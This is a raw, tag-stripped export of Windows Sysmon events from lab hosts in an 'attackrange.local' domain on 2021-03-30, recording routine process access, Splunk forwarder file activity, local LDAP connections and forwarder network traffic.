16:31:08.434{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E3C-6063-1500-00000000AF01}1232C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061402Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:08.371{7F8C56E7-4E3C-6063-0D00-00000000AF01}8924808C:\Windows\system32\svchost.exe{7F8C56E7-4E3C-6063-1000-00000000AF01}100C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061401Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:08.371{7F8C56E7-4E3C-6063-0D00-00000000AF01}8924808C:\Windows\system32\svchost.exe{7F8C56E7-4E3C-6063-1600-00000000AF01}1280C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000246148Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:08.301{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6456ACC504681CAA80E61486F5694826,SHA256=FCAE7BDBDE7191A15C8F90A859741567AEEB62D04EB1E2E68964A13A45F229ED,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061408Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:06.878{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54831-false10.0.1.12-8000- 23542300x80000000000000001061407Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:09.168{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=59410AEE7B4163D445A0D9EED06CA4DD,SHA256=A4AD8B6A07FFC93A6B707DB62907CFA55640C6AB6E9917A82CDDDBCE0FAEDDDC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061406Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:09.168{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AADE0D6EFD10354DCEADC1B14C961C79,SHA256=AE3F4EB087DE0BA115A052EA67E9202D1A1F98AD82BD379A3E4FED1C555ED27A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246149Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:09.301{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2F6B40E8E02DBB4C411405C43ABFB6EE,SHA256=387ACCCA86A548A085C5EFA523335B4BA1928AB78D29BA7AAB2F348AACB4804F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061409Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:10.528{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1838A5577D6F3F78B50FED2C7CDAA17,SHA256=B284745BE28A30876F2111960C8862B8454B3731AB2C891A5FA7DFF526D129EF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246152Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:10.301{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1C7335B415A827256EF61A29158E6AB,SHA256=644AFCFB854592034A9CC3D38E0E21A04F09120701D246F3C83B459900CAB58B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246151Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:10.160{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=70FAAA70055A27387813E31C6CBE3137,SHA256=80984F94A020A299A9F27A9276A43EB377D28F22AFB86735DF23265615233A01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246150Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:10.160{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8930767A1EC57E0CD5F8F36BBD42A1FB,SHA256=89B564516F981C3078B57F81A7BE0E2E40B054140E62485CFF4EBA18D379E4A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061410Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:11.903{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=125ACA8E5B495A8E137B6E181FED3718,SHA256=C3EC26786FCADD5C8F03B68B66431FA0F9A17BA94CFAAF847A5AB172F7840921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246154Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:11.301{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BCB856599FA25FD1813919B552A8323,SHA256=8625BB4E43B6152FE0D9A4AF46E2C6D5C466679A81DE0120CCE73E495393450E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246153Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:09.577{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64801-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x8000000000000000246155Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:12.301{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C373B515439EDB96D587AE51B1D37B6,SHA256=D8376E239404B0C4DDA511263B3E76E9DB3D914D3891EC40FCF80629ECC3FD30,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061411Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:13.262{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=101872043D42C2376D137AD4F67BA769,SHA256=5E0122BC09471419EA3662D8B52F20D72402F3170140DB9E76C4657F356AAFAC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246156Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:13.301{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8029752A18FC0D0FE89DF66F92CEC65B,SHA256=BDB0F940AA5CC67E46AD4963EB47EC25F902643A386D4A0E4638D3F7158B0517,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061412Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:14.622{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB3F31E0195688FF4A26651CA3F8A093,SHA256=5880FB830467EF43842896D6C7281B10E6EE0F6531FD6316B4F9DC52724156F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246157Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:14.301{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E4178AC80B6D0D5B94C007A9DAAE17C,SHA256=01A51EA431D7636FCC8C2F235B0FD87177E9F89CE68F20C1C9E1F417CF98E75C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061414Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:15.981{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6141496544AC8121A6802B078794EE3,SHA256=F4C29293735BB63C7114BB71E7C61CB0B41C0CBF06955C42DB1CC68657C6F0DE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061413Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:12.879{7F8C56E7-4E56-6063-7600-00000000AF01}3780C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-877.attackrange.local54832-false10.0.1.12-8000- 23542300x8000000000000000246160Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:15.301{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5177C6E96F68441E3EC9D7F21FC032B,SHA256=AAED004B3D36B36738919E9ACF004D9D78F9A53D0936B4E981EF9AA53DBAC5A8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246159Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:15.176{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=21E3072B6863A297B590ACC9205862BE,SHA256=556BDA5766AF59C86121AE35A0B9248ECC0372457600501C1161A202CB5DAA21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246158Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:15.176{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=70FAAA70055A27387813E31C6CBE3137,SHA256=80984F94A020A299A9F27A9276A43EB377D28F22AFB86735DF23265615233A01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246162Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:16.301{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=498B266115334835A00347B7934AF078,SHA256=9D8B0B04E67FC860F5919EA5E9C9D5D2F5826912025710B3D19EAE5F3650E72B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000246161Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:14.609{CB4067E1-30B6-6062-C600-00000000AF01}1460C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-847.attackrange.local64802-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x80000000000000001061415Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:17.341{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E26BAEB339B9A082C6C5EBBD616DF1E,SHA256=265D6B483113EDAD01B7CC472B548BEF5FCCA2A557AB6074ACCFB882D889CCA2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246163Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:17.316{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FF7F151DD9D4D0996DC9EE8C61E3EE2,SHA256=4572A74F0E7496072217FF75DAF16CA0184553E4693EAF84DE1E7695DEB8E85A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246164Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:18.332{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E72A0638366729393C30937A7158E4C,SHA256=32FE8DF0F63F6E3F99E8D2A680AB09E246C88DC804D6CA756095A5693EF9C0C8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000246165Microsoft-Windows-Sysmon/Operationalwin-host-847.attackrange.local-2021-03-30 16:31:19.365{CB4067E1-30BC-6062-CF00-00000000AF01}3508NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66B12BA1595AB4A3B79EC16160960BEA,SHA256=A51CB048B12767F3CE41B26C27028C5B5F31BFD26C43A86120CD0EE2AE1C3889,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001061428Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:17.863{7F8C56E7-4E3B-6063-0B00-00000000AF01}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local54833-true0:0:0:0:0:0:0:1win-dc-877.attackrange.local389ldap 354300x80000000000000001061427Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:17.863{7F8C56E7-4E4C-6063-2F00-00000000AF01}988C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exeNT AUTHORITY\SYSTEMtcptruetrue0:0:0:0:0:0:0:1win-dc-877.attackrange.local54833-true0:0:0:0:0:0:0:1win-dc-877.attackrange.local389ldap 10341000x80000000000000001061426Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:20.482{7F8C56E7-5258-6063-2E01-00000000AF01}47525172C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061425Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:20.357{7F8C56E7-4E4D-6063-3B00-00000000AF01}28842140C:\Windows\system32\conhost.exe{7F8C56E7-5258-6063-2E01-00000000AF01}4752C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061424Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:20.357{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061423Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:20.357{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061422Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:20.357{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061421Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:20.357{7F8C56E7-4E3C-6063-0C00-00000000AF01}832876C:\Windows\system32\svchost.exe{7F8C56E7-4E4C-6063-2D00-00000000AF01}2148C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001061420Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:20.357{7F8C56E7-4E3A-6063-0500-00000000AF01}412428C:\Windows\system32\csrss.exe{7F8C56E7-5258-6063-2E01-00000000AF01}4752C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000001061419Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:20.357{7F8C56E7-4E4C-6063-3300-00000000AF01}23643588C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{7F8C56E7-5258-6063-2E01-00000000AF01}4752C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000001061418Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:20.360{7F8C56E7-5258-6063-2E01-00000000AF01}4752C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{7F8C56E7-4E3B-6063-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{7F8C56E7-4E4C-6063-3300-00000000AF01}2364C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001061417Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:20.357{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A840CA0E38D7AE762A66F5C3A0CC2478,SHA256=E532B27AFB998E6F739161132FBA41C501143C7C526CDFBDCC46F179D256016C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001061416Microsoft-Windows-Sysmon/Operationalwin-dc-877.attackrange.local-2021-03-30 16:31:20.357{7F8C56E7-4E5D-6063-7F00-00000000AF01}3584NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 